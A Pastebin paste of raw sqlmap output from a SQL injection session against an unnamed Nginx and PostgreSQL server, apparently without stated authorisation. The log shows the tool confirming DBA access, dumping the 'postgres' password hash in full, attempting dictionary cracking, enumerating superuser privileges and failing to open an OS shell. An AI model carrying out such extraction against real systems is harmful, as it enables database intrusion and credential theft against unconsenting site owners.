Advertisement
Guest User

trr

a guest
May 20th, 2019
346
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.49 KB | None | 0 0
  1. web server operating system: Linux Ubuntu
  2. web application technology: Nginx 1.15.5
  3. back-end DBMS operating system: Linux Ubuntu
  4. back-end DBMS: PostgreSQL
  5. banner: 'PostgreSQL 10.8 (Ubuntu 10.8-0ubuntu0.18.10.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 8.2.0-7ubuntu1) 8.2.0, 64-bit'
  6. [08:13:25] [INFO] testing if current user is DBA
  7. current user is DBA: True
  8. [08:13:25] [INFO] fetching database users
  9. [08:13:25] [INFO] used SQL query returns 1 entry
  10. [08:13:25] [INFO] resumed: 'postgres'
  11. database management system users [1]:
  12. [*] postgres
  13.  
  14. [08:13:25] [INFO] fetching database users password hashes
  15. [08:13:25] [INFO] used SQL query returns 1 entry
  16. [08:13:25] [INFO] resumed: 'postgres'
  17. [08:13:25] [INFO] resumed: 'md5b2b980c5a4a07939e5e8d0a4fd5cbe41'
  18. do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
  19. do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
  20. [08:13:36] [INFO] using hash method 'postgres_passwd'
  21. what dictionary do you want to use?
  22. [1] default dictionary file '/home/achonk/sqlmap/txt/wordlist.zip' (press Enter)
  23. [2] custom dictionary file
  24. [3] file with list of dictionary files
  25. >
  26. [08:13:37] [INFO] using default dictionary
  27. do you want to use common password suffixes? (slow!) [y/N]
  28. [08:13:37] [INFO] starting dictionary-based cracking (postgres_passwd)
  29. [08:13:37] [INFO] starting 2 processes
  30. [08:14:43] [WARNING] no clear password(s) found
  31. database management system users password hashes:
  32. [*] postgres [1]:
  33. password hash: md5b2b980c5a4a07939e5e8d0a4fd5cbe41
  34.  
  35. [08:14:43] [INFO] fetching database users privileges
  36. [08:14:43] [INFO] used SQL query returns 1 entry
  37. [08:14:43] [INFO] resumed: 'postgres'
  38. [08:14:43] [INFO] resumed: '1'
  39. [08:14:43] [INFO] resumed: '1'
  40. [08:14:44] [WARNING] reflective value(s) found and filtering out
  41. database management system users privileges:
  42. [*] postgres (administrator) [2]:
  43. privilege: createdb
  44. privilege: super
  45.  
  46. [08:14:44] [WARNING] on PostgreSQL the concept of roles does not exist. sqlmap will enumerate privileges instead
  47. [08:14:44] [INFO] fetching database users privileges
  48. database management system users roles:
  49. [*] postgres (administrator) [2]:
  50. role: createdb
  51. role: super
  52.  
  53. [08:14:44] [CRITICAL] unable to prompt for an interactive operating system shell via the back-end DBMS because stacked queries SQL injection is not supported
  54. [08:14:44] [WARNING] HTTP error codes detected during run:
  55.  
  56.  
  57. [*] ending @ 08:14:44 /2019-05-21/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement